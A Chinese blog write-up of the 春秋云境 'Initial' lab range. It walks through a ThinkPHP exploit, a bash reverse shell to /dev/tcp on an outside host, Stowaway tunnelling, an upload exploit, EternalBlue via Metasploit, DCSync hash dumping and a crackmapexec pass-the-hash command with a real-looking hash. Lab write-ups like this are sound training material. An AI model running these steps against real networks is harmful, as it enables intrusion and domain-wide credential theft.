春秋云境-Initial
春秋云境-Initial
1 | 签到领的沙硕😋😋😋 |
首先打开分配的ip,是某一个管理系统

fscan扫一下,发现有漏洞,直接去打

使用Thinkphp直接打漏洞

sudo发现mysql具有s权限,不过在这个工具上面提不了权限(可以考虑反弹shell到服务器上面去弹然后提权),不过没必要,直接去读/root/flag/f*里面的flag

上传fscan去扫一下发现多个东西,可以看到内网有 172.22.1.18 信呼协同,还有 MS17-010 漏洞


1 | bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/2333 <&1' |

做一个内网通信,可以用 frp 也可以用 stowaway (https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2)
先在服务器运行 admin 文件后,再在靶机上运行 agent 得到响应
找到对应 linux 靶机的 agent 传到靶机上,admin 传到自己服务器上
1 | ./linux_x64_admin -l 5001 -s 123 |
记得去安全组那里把5001端口打开


服务器上
1 | use 0 |


打上去

通过 sockes 可以实现内网通信了,使用 proxifier 弄一个全局代理
然后windows主机去访问172.22.1.18
1 | 登录页面: |

登陆后直接利用 poc,打一个文件上传 nday

1 | import requests |
远程文件上传,传上去小🐎

连接,直接就是system,拿到flag

还剩一台靶机 ms17-010
先永恒之蓝直接打,在kali里面直接打

1 | proxychains4 msfconsole //做好代理连接,利用msf模块直接打 |
得到 system 权限后用 creds_all 等命令收集内网凭据,而我们控制的这台机器是有 DCSync 的权限的 (因为这个是 DC1,也就是域控制器), 所以能直接从域控上导出 Hash
1 | load kiwi |
用 crackmapexec 打 hash 传递
1 | proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" |

拿下徽章嘻嘻嘻

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 黄鼠🐺好饿啊!
